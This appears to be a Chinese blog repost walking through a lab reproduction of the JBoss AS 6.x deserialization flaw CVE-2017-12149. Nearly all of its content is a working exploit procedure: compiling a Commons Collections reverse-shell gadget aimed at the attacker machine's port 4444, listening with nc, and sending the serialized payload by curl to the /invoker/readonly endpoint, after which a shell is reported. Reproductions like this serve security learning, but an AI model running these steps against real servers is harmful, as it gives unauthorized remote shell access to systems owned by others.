博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现
阅读量:2259 次
发布时间:2019-05-09

本文共 866 字,大约阅读时间需要 2 分钟。

本机IP:192.168.220.145

靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final

首先访问目标地址,http://192.168.220.139:8080/invoker/readonly

返回500,一般存在

执行命令

┌─[root@sch01ar]─[~]└──╼ #cd /sch01ar/JavaDeserH2HC/┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]└──╼ #javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]└──╼ #java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.220.145:4444Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

生成了一个ReverseShellCommonsCollectionsHashMap.ser文件

用nc监听4444端口

┌─[✗]─[root@sch01ar]─[~]└──╼ #nc -vlp 4444

发送payload

┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]└──╼ #curl http://192.168.220.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

nc成功返回shell

 

转载于:https://www.cnblogs.com/sch01ar/p/8418525.html

你可能感兴趣的文章
外网无法ip访问服务器解决方法 (原)
查看>>
eclipse部署的web项目没有添加到Tomcat的webapps目录下解决方法
查看>>
sql注入原理及解决方案
查看>>
struts2异常处理,global-results定义全局结果处理
查看>>
【解决】Word 在试图打开文件时遇到错误 请尝试下列方法:* xxx * xxx * xxx
查看>>
Android手机插上usb能充电但不能识别的一种解决方法
查看>>
微软Print to PDF打印机提示参数错误的解决方法
查看>>
关于vue+element-ui项目的分页,返回默认显示第一页的问题解决
查看>>
java微信公众号开发token验证失败的问题及解决办法
查看>>
遗传算法解决旅行商问题(TSP)
查看>>
mysql删除数据后id自增不连续的解决方法
查看>>
Windows下运行rabbitmqctl 相关命令(如rabbitmqctl stop)报错:Error: unable to perform an operation on node解决方案
查看>>
解决hash冲突的三种方法
查看>>
easyui placeholder 解决方案
查看>>
问题解决java.lang.IllegalArgumentException at org.springframework.asm.ClassReader
查看>>
SpringCloud服务消费者第一次调用出现超时问题的解决方案
查看>>
解决linux 升级高版本python3.7后yum不能使用的问题
查看>>
js 定时器(setTimeout/setInterval)出现变量未定义(xxx is not defined) 的解决方法
查看>>
https Java SSLException protocol_version的问题解决方法
查看>>
PHP Apache shutdown unexpectedly启动错误解释及解决的方法
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-06-28 13:38:12   当前IP: 18.219.2.137   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我